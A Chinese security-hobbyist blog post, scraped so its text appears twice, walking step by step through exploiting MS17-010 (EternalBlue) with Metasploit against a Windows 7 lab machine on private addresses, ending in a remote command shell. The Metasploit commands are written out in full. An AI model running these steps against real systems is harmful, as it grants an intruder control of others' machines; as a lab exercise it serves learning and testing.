Document
R1v0ir_blog
 
社交按钮
2280357760
首页
归档
标签
关于
友人帐

一个网安爱好者、羽毛球爱好者、记录生活的小菜鸡,
在读于三线不入流野鸡学校 | Theme: Fog
载入天数...
载入时分秒...
05/06/2020
2020-05-06
3 min read
MS17_010

验证MS17_010(永恒之蓝)

漏洞描述:
Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件共享端口的Windows机器,向目标机器发送特制报文触发缓冲区溢出,导致在目标机器上远程执行任意代码。

实验目的:
通过Metasploit框架对win7主机进行渗透攻击,利用永恒之蓝MS17-010模块对该win7进行渗透,最终获得控制权。

实验环境:
渗透机:kali linux ip:192.168.100.128
靶机:win7 ip:192.168.100.130

实验要求:
kali能ping通win7 win7开启445端口 可用命令检查

nmap -p 445 ip

1.数据库初始化(如果是第一次使用则需要)

root@kali:~# msfdb init

2.终端进入metasploit

root@kali:~# msfconsole

3.进入以后 搜索漏洞 输入

msf5> search ms17-010

4.上一步返回的结果里 第三个模块 就是我们要利用的模块

exploit/windows/smb/ms17_010_eternalblue (这一条不是命令 是返回的结果)

5.使用这个模块 命令行输入

msf5>use exploit/windows/smb/ms17_010_eternalblue

6.在ms17-010模块中 输入show options即可展开全部该模块的使用设置

其中Required项为YES的是必须填写的,我们可以看到RHOSTST此时还为空,代表我们需要填写内容进去!注:RHOSTS为目标主机的IP地址

7.设置靶机IP (也就是win7的ip) 输完命令后回车会返回设置好的结果

msf5 exploit(windows/smb/ms17_010_eternalblue)> set rhosts 靶机IP

8.开始模块利用 输入run或者exploit 然后回车

msf5 exploit(windows/smb/ms17_010_eternalblue)> run

在第8步返回结果中 会有一行 Command shell session 1 opened(渗透机IP-->靶机IP)
的返回结果 这条结果说明拿到了shell 也就是拿到了控制权

此时会发现 输入命令的前面变了 变成
C:\Windows\system32>
这样也说明我们进入win7的cmd界面

9.查一下ip 是否是靶机的ip 是否能执行

C:\Windows\system32> ipconfig

执行以后 会返回靶机的IP信息

上一篇 利用Metasploit对Ftp和Telnet服务进行暴力破解

请到客户端“主题--自定义配置--valine”中填入ID和KEY

\media\images\custom-bgimage.jpg
R1v0ir_blog  |
  • 首页
  • 归档
  • 标签
  • 关于
  • 友链
2020-05-06
3 min read
MS17_010

验证MS17_010(永恒之蓝)

漏洞描述:
Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件共享端口的Windows机器,向目标机器发送特制报文触发缓冲区溢出,导致在目标机器上远程执行任意代码。

实验目的:
通过Metasploit框架对win7主机进行渗透攻击,利用永恒之蓝MS17-010模块对该win7进行渗透,最终获得控制权。

实验环境:
渗透机:kali linux ip:192.168.100.128
靶机:win7 ip:192.168.100.130

实验要求:
kali能ping通win7 win7开启445端口 可用命令检查

nmap -p 445 ip

1.数据库初始化(如果是第一次使用则需要)

root@kali:~# msfdb init

2.终端进入metasploit

root@kali:~# msfconsole

3.进入以后 搜索漏洞 输入

msf5> search ms17-010

4.上一步返回的结果里 第三个模块 就是我们要利用的模块

exploit/windows/smb/ms17_010_eternalblue (这一条不是命令 是返回的结果)

5.使用这个模块 命令行输入

msf5>use exploit/windows/smb/ms17_010_eternalblue

6.在ms17-010模块中 输入show options即可展开全部该模块的使用设置

其中Required项为YES的是必须填写的,我们可以看到RHOSTST此时还为空,代表我们需要填写内容进去!注:RHOSTS为目标主机的IP地址

7.设置靶机IP (也就是win7的ip) 输完命令后回车会返回设置好的结果

msf5 exploit(windows/smb/ms17_010_eternalblue)> set rhosts 靶机IP

8.开始模块利用 输入run或者exploit 然后回车

msf5 exploit(windows/smb/ms17_010_eternalblue)> run

在第8步返回结果中 会有一行 Command shell session 1 opened(渗透机IP-->靶机IP)
的返回结果 这条结果说明拿到了shell 也就是拿到了控制权

此时会发现 输入命令的前面变了 变成
C:\Windows\system32>
这样也说明我们进入win7的cmd界面

9.查一下ip 是否是靶机的ip 是否能执行

C:\Windows\system32> ipconfig

执行以后 会返回靶机的IP信息

上一篇 利用Metasploit对Ftp和Telnet服务进行暴力破解

请到客户端“主题--自定义配置--valine”中填入ID和KEY